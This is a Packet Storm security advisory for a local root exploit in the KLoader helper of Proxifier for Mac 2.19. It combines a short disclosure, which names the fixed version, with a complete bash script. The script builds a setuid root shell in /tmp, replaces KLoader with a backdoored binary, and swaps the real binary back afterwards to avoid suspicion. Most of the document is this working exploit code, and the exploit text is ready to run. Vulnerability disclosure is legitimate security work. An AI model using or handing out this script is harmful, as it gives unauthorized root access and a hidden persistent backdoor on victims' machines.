Proxifier For Mac 2.19 Local Privilege Escalation

2017-12-06T00:00:00
ID PACKETSTORM:145239
Type packetstorm
Reporter Mark Wadham
Modified 2017-12-06T00:00:00

Description

                                        
                                            `# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader  
# binary that ships with Proxifier <= 2.18.  
#  
# Unfortunately 2.19 is also vulnerable to a slightly different attack that  
# yields the same result.  
#  
# When Proxifier is first run, if the KLoader binary is not suid root it gets  
# executed as root by Proxifier.app (the user is prompted to enter an admin  
# password). The KLoader binary will then make itself suid root so that it  
# doesn't need to prompt the user again.  
#  
# The Proxifier developers added parameter sanitisation and kext signature  
# verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app  
# does no verification of the KLoader binary that gets executed as root.  
#  
# The directory KLoader sits in is not root-owned so we can replace it with  
# our own binary that will get executed as root when Proxifier starts.  
#  
# To avoid raising any suspicion, as soon we get executed as root we can swap  
# the real KLoader binary back into place and forward the execution call on  
# to it. It does require the user to re-enter their credentials the next time  
# Proxifier is run but it's likely most users wouldn't think anything of this.  
#  
# Users should upgrade to version 2.19.2.  
#  
# https://m4.rkw.io/proxifier_privesc_219.sh.txt  
# 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac  
# -------------------------------------------------------------------  
  
#!/bin/bash  
  
#####################################################################  
# Local root exploit for vulnerable KLoader binary distributed with #  
# Proxifier for Mac v2.19 #  
#####################################################################  
# by m4rkw, shouts to #coolkids :P #  
#####################################################################  
  
cat > a.c <<EOF  
#include <stdio.h>  
#include <unistd.h>  
  
int main()  
{  
setuid(0);  
seteuid(0);  
  
execl("/bin/bash", "bash", NULL);  
return 0;  
}  
EOF  
  
gcc -o /tmp/a a.c  
  
cat > a.c <<EOF  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
  
int main(int ac, char *av[])  
{  
if (geteuid() != 0) {  
printf("KLoader: UID not set to 0\n");  
return 104;  
} else {  
seteuid(0);  
setuid(0);  
  
chown("/tmp/a", 0, 0);  
chmod("/tmp/a", strtol("4755", 0, 8));  
rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");  
chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);  
chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));  
execv("/Applications/Proxifier.app/Contents/KLoader", av);  
  
return 0;  
}  
}  
EOF  
  
mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2  
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c  
rm -f a.c  
  
echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."  
  
`